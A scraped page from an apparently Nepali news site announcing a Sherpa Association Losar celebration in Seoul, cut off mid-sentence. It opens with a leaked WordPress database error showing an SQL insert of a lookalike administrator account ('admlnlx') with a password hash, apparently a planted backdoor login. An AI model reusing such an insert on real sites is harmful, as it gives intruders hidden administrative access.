WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlQTO.2X74Novp6Rrl3TNmFZqYhh1S1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 04:24:02', '', 'admlnlx', 'admlnlx')
“भाषा लिपी मौलिक चाडबाट हाम्रो पहिचान, ऐतिहासिक सास्कृतिक परम्परा सम्रक्षण र बिकास गर्ने हाम्रो अभियान” भन्ने मूल नाराका साथ शेर्पा संघ दक्षिण कोरियाले “ग्यल्मो लोसार साझा सखम फाग ल्हो २१४६” मनाउने भएको छ ।
कोरियाको नयाँ वर्ष सालनालको अवसर पारेर यस वर्ष पनि लोसार साझ मनाउन लागेको आयोजकले जनाएको छ । कोरियाको राजाधानी सौलको दोङ्देमुन दग्सिब्री याक स्थित ८८ खुल्ला थेक हलमा फेब्रुअरी ४ मा बेलुकी ७ बजे बाट फेब्रुअरी ५ को बिहानको ६ बजे सम्म सन्चालन हुने छ ।
लोसार साझामा स्थानिया कलाकारहरुको साथमा रास्टिय कलाकारको प्रस्तुती रहने